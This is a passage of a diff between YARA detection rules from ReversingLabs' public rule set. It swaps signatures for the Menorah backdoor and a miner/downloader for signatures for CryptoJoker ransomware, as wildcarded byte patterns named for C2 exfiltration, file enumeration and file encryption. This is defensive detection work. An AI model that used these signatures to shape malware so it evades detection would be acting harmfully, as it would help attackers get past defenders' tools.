-            ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ??
-            A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2
-            25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25
-            1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? 8C ?? ??
-            ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ??
-            ?? A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ??
-            A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
-            25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 2B ?? 7E
+		$encrypt_files = {
+            8A 01 41 84 C0 75 ?? 2B CA C6 85 ?? ?? ?? ?? ?? 33 C0 88 84 05 ?? ?? ?? ?? 40 3D ??
+            ?? ?? ?? 72 ?? 33 F6 8B C6 33 D2 F7 F1 8A 04 3A 02 C1 30 84 35 ?? ?? ?? ?? 46 81 FE
+            ?? ?? ?? ?? 72 ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 55 ?? 8B F8 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            D8 85 FF 74 ?? 85 DB 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 57 68 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 8B F0 8D 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 53 56 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 57 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ??
+            83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 83 F8
+            ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B
+            41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ??
+            E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D
+            ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ??
+            2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8
+            ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B
+            C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ??
+            ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B
+            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $persistence_mechanism ) and ( $crypto_miner ) and ( $downloader ) and ( all of ( $network_communication_p* ) )
+		uint16( 0 ) == 0x5A4D and $find_files_1_0 and $find_files_1_1 and $find_files_1_2 and $encrypt_files
 }
-rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Menorah : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Cryptojoker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Menorah backdoor."
+		description = "Yara rule that detects CryptoJoker ransomware."
 		author = "ReversingLabs"
-		id = "4f13a6c6-bd97-58aa-ac3b-399866b5c63b"
-		date = "2024-05-10"
-		modified = "2024-05-10"
+		id = "50a9280b-a352-5a2b-acee-5690e509dfd7"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/ByteCode.MSIL.Backdoor.Menorah.yara#L1-L169"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.CryptoJoker.yara#L1-L140"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "770aefca192ceb3a778c0b1259105ace8e64cb35d0c34acb15c45fb6f22ad94b"
+		logic_hash = "42ee1e63ada1ae986f43a1300eda0b1fa7b54c26be31ef5637bb321defffbe40"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "Menorah"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "CryptoJoker"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$send_fingerprint_to_c2_p1 = {
-            28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A
-            73 ?? ?? ?? ?? 19 1F 0E 6F ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 1F 5B 13 ?? 12 ?? 28 ?? ??
-            ?? ?? 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 5D 13 ??
-            12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 25 16 1F 5B 13 ?? 12 ?? 28 ??
-            ?? ?? ?? A2 25 17 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 06 A2 25 19 1F 40 13 ??
-            12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 5D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 0D 1F 3F 13 ?? 12
-            ?? 28 ?? ?? ?? ?? 17 16 28 ?? ?? ?? ?? 1F 3D 13 ?? 12 ?? 28 ?? ?? ?? ?? 17 16 28 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 03 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 74 ?? ?? ?? ??
-            13 ?? 11 ?? 1F 50 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 4F 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 53
-            13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 54 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 11 ?? 1F 21 8D ?? ?? ?? ?? 25 16 1F 61 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F
-            70 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F 70 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F
-            6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F
-            63 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 61 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F
-            74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 09
-        }
-		$send_fingerprint_to_c2_p2 = {
-            1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 6E 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25
-            1F 0B 1F 2F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 78 13 ?? 12 ?? 28 ?? ?? ?? ??
-            A2 25 1F 0D 1F 2D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E 1F 77 13 ?? 12 ?? 28 ?? ??
-            ?? ?? A2 25 1F 0F 1F 77 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 10 1F 77 13 ?? 12 ?? 28
-            ?? ?? ?? ?? A2 25 1F 11 1F 2D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 12 1F 66 13 ?? 12
-            ?? 28 ?? ?? ?? ?? A2 25 1F 13 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 14 1F 72 13
-            ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 15 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 16 1F
-            2D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 17 1F 75 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F
-            18 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 19 1F 6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
-            25 1F 1A 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1B 1F 6E 13 ?? 12 ?? 28 ?? ?? ??
-            ?? A2 25 1F 1C 1F 63 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1D 1F 6F 13 ?? 12 ?? 28 ??
-            ?? ?? ?? A2 25 1F 1E 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1F 1F 65 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 25 1F 20 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 11 ?? 08 8E 69 6A 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 08 16 08 8E 69 6F
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25
-            6F ?? ?? ?? ?? 0D 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 13 ?? DE ?? 26 7E ?? ?? ?? ?? 13
-            ?? DE ?? 11
+		$call_encrypt = {
+            2B 02 26 16 FE 09 00 00 FE 09 01 00 FE 09 02 00 6F ?? ?? ?? ?? 2A
         }
-		$get_files_and_directories_p1 = {
-            11 ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 17 31 ??
-            11 ?? 17 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 1F 0F 8D
-            ?? ?? ?? ?? 25 16 1F 44 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 69 13 ?? 12 ?? 28 ??
-            ?? ?? ?? A2 25 18 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 65 13 ?? 12 ?? 28 ??
-            ?? ?? ?? A2 25 1A 1F 63 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 74 13 ?? 12 ?? 28 ??
-            ?? ?? ?? A2 25 1C 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F 72 13 ?? 12 ?? 28 ??
-            ?? ?? ?? A2 25 1E 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 09 1F 20 13 ?? 12 ?? 28
-            ?? ?? ?? ?? A2 25 1F 0A 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 66 13 ?? 12
-            ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0D 11 ?? A2
-            25 1F 0E 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28
-            ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 73 ?? ?? ?? ??
-            13 ?? 1F 0B 8D ?? ?? ?? ?? 25 16 11 ?? A2 25 17 11 ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 1F
-            16 8D ?? ?? ?? ?? 25 16 1F 4D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 4D 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 25 18 1F 2F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 64 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 25 1A 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 2F 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 25 1C 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F 79 13 ?? 12
+		$encrypt_files = {
+            2B 02 26 16 20 04 ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 26 20 00 04 ?? ?? 73 ?? ?? ?? ?? 0C 20 05 ?? ?? ??
+            16 39 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 20 04 ?? ?? ?? FE ?? ?? ?? FE ?? ??
+            ?? 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 38 ?? ?? ?? ?? 26
+            20 03 ?? ?? ?? 16 39 ?? ?? ?? ?? 26 00 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ??
+            ?? ?? ?? 26 20 00 ?? ?? ?? 38 ?? ?? ?? ?? 00 00 08 06 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ??
+            ?? ?? 26 20 03 ?? ?? ?? 38 ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 13 04 20 04 ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ??
+            26 00 08 07 17 28 ?? ?? ?? ?? 0D 38 ?? ?? ?? ?? 20 03 ?? ?? ?? FE ?? ?? ?? FE ?? ?? ?? 45 ?? ?? ?? ?? ?? ??
+            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 38 ?? ?? ?? ?? 26 20 02 ?? ?? ?? 38 ?? ?? ?? ?? 11 04
+            13 05 DD ?? ?? ?? ?? 00 08 16 28 ?? ?? ?? ?? 00 00 DC 08 14 FE 01 13 06 11 06 3A ?? ?? ?? ?? 08 28 ?? ?? ??
+            ?? 00 DC 00 11 05 2A
         }
-		$get_files_and_directories_p2 = {
-            28 ?? ?? ?? ?? A2 25 1E 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F 79 13 ?? 12
-            ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 68 13
-            ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 68 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0D 1F
-            3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F
-            0F 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 10 1F 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
-            25 1F 11 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 12 1F 73 13 ?? 12 ?? 28 ?? ?? ??
-            ?? A2 25 1F 13 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 14 1F 74 13 ?? 12 ?? 28 ??
-            ?? ?? ?? A2 25 1F 15 1F 74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 1F 3C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 44
-            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 49 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 52
-            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F 3E 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 72 ??
-            ?? ?? ?? A2 25 1F 09 11 ?? 6F ?? ?? ?? ?? A2 25 1F 0A 72 ?? ?? ?? ?? A2 28 ?? ?? ??
-            ?? 13 ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 11 ?? 13 ?? 16 13 ?? 38
-            ?? ?? ?? ?? 11 ?? 11 ?? 9A 73 ?? ?? ?? ?? 13 ?? 1F 0C 8D ?? ?? ?? ?? 25 16 11 ?? A2
-            25 17 11 ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 1F 16 8D ?? ?? ?? ?? 25 16 1F 4D 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 25 17 1F 4D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F 2F 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 25 19 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 64 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 25 1B 1F 2F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 79 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 25 1D 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 79 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 25 1F 09 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 20 13
+		$start_process = {
+            2B ?? 26 16 20 10 ?? ?? ?? 38 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 20 ?? ?? ?? ??
+            38 ?? ?? ?? ?? 00 11 05 17 28 ?? ?? ?? ?? 20 06 ?? ?? ?? 38 ?? ?? ?? ?? 00 28 ?? ?? ?? ??
+            0A 20 09 ?? ?? ?? 38 ?? ?? ?? ?? 00 11 05 08 28 ?? ?? ?? ?? 20 12 ?? ?? ?? 38 ?? ?? ?? ??
+            11 06 17 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38
+            ?? ?? ?? ?? 11 05 17 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 38 ?? ?? ?? ?? 11 06 19 20 ?? ?? ?? ??
+            28 ?? ?? ?? ?? A2 20 0F ?? ?? ?? 38 ?? ?? ?? ?? 1A 8D ?? ?? ?? ?? 13 06 20 02 ?? ?? ?? 38
+            ?? ?? ?? ?? 00 11 04 28 ?? ?? ?? ?? 26 20 13 ?? ?? ?? 38 ?? ?? ?? ?? 08 09 28 ?? ?? ?? ??
+            20 07 ?? ?? ?? 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 05 38 ?? ?? ?? ?? 26 20 0D ?? ?? ?? 38 ??
+            ?? ?? ?? 11 06 0D 38 ?? ?? ?? ?? 20 10 ?? ?? ?? FE ?? ?? ?? FE ?? ?? ?? 45 ?? ?? ?? ?? ??
+            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 20 08 ?? ?? ?? 17 3A ?? ?? ?? ??
+            26 11 06 18 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 20 00 ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ??
+            26 06 07 28 ?? ?? ?? ?? 0C 20 0B ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 26 11 06 16 20 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? A2 17 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 26 20 03 ?? ?? ?? 16 39 ?? ??
+            ?? ?? 26 00 11 04 11 05 28 ?? ?? ?? ?? 20 0A ?? ?? ?? 17 3A ?? ?? ?? ?? 26 00 73 ?? ?? ??
+            ?? 13 04 20 04 ?? ?? ?? 38 ?? ?? ?? ?? 2A
         }
-		$get_files_and_directories_p3 = {
-            12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 68 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 68
-            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0D 1F 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E
-            1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0F 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25
-            1F 10 1F 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 11 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ??
-            A2 25 1F 12 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 13 1F 20 13 ?? 12 ?? 28 ?? ??
-            ?? ?? A2 25 1F 14 1F 74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 15 1F 74 13 ?? 12 ?? 28
-            ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 1F 46
-            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 49 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 4C
-            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 45 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 72 ??
-            ?? ?? ?? A2 25 1E 11 ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 09 72 ??
-            ?? ?? ?? A2 25 1F 0A 11 ?? 6F ?? ?? ?? ?? A2 25 1F 0B 72 ?? ?? ?? ?? A2 28 ?? ?? ??
-            ?? 13 ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 1F 0B 8D ?? ?? ?? ?? 25
-            16 11 ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? 8E 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
-            25 19 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 44 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
-            25 1B 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
-            25 1D 1F 28 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
-            25 1F 09 1F 29 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 72 ?? ?? ?? ?? A2 28 ?? ?? ??
-            ?? 13 ?? 1F 0B 8D ?? ?? ?? ?? 25 16 11 ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? 8E
-            69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F
+		$msgbox_timer = {
+            00 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 28 ?? ?? ?? ?? 0C
+            00 02 7B ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 DE 12 08 14 FE 01
+            13 04 11 04 2D ?? 08 6F ?? ?? ?? ?? 00 DC 00 02 7B ?? ?? ?? ?? 16 32 0E 02 7B
+            ?? ?? ?? ?? 16 FE 04 16 FE 01 2B ?? 16 00 13 04 11 04 2D ?? 00 02 7B ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 38 ?? ?? ?? ?? 02 7B ??
+            ?? ?? ?? 2D ?? 02 7B ?? ?? ?? ?? 2D ?? 02 7B ?? ?? ?? ?? 16 FE 01 16 FE 01 2B
+            ?? 17 00 13 04 11 04 2D ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ??
+            ?? 0D 09 17 6F ?? ?? ?? ?? 00 09 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 1F 40 28 ??
+            ?? ?? ?? 26 00 38 ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 17 FE 04 16 FE 01 13 04 11
+            04 2D ?? 00 02 1F 3B 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 FE 04 16 FE 01 13 04
+            11 04 2D ?? 00 02 1F 3B 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 16 FE 01 13 04 11 04
+            2D ?? 02 25 7B ?? ?? ?? ?? 17 59 7D ?? ?? ?? ?? 00 2B ?? 02 25 7B ?? ?? ?? ??
+            17 59 7D ?? ?? ?? ?? 00 2B ?? 02 25 7B ?? ?? ?? ?? 17 59 7D ?? ?? ?? ?? 02 7B
+            ?? ?? ?? ?? 1F 09 FE 02 16 FE 01 13 04 11 04 2D ?? 02 7B ?? ?? ?? ?? 02 7C ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2B ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ??
+            ?? 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ??
+            ?? ?? ?? 1F 09 FE 02 16 FE 01 13 04 11 04 2D ?? 02 7B ?? ?? ?? ?? 02 7C ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2B ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ??
+            02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ??
+            ?? ?? 1F 09 FE 02 16 FE 01 13 04 11 04 2D ?? 02 7B ?? ?? ?? ?? 02 7C ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2B ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 02
+            7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 2A
         }
-		$upload_file_to_c2_p1 = {
-            11 ?? 28 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 17 3E ?? ?? ?? ?? 11 ??
-            17 9A 17 8D ?? ?? ?? ?? 25 16 1F 22 9D 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 39
-            ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 02 28 ?? ?? ?? ??
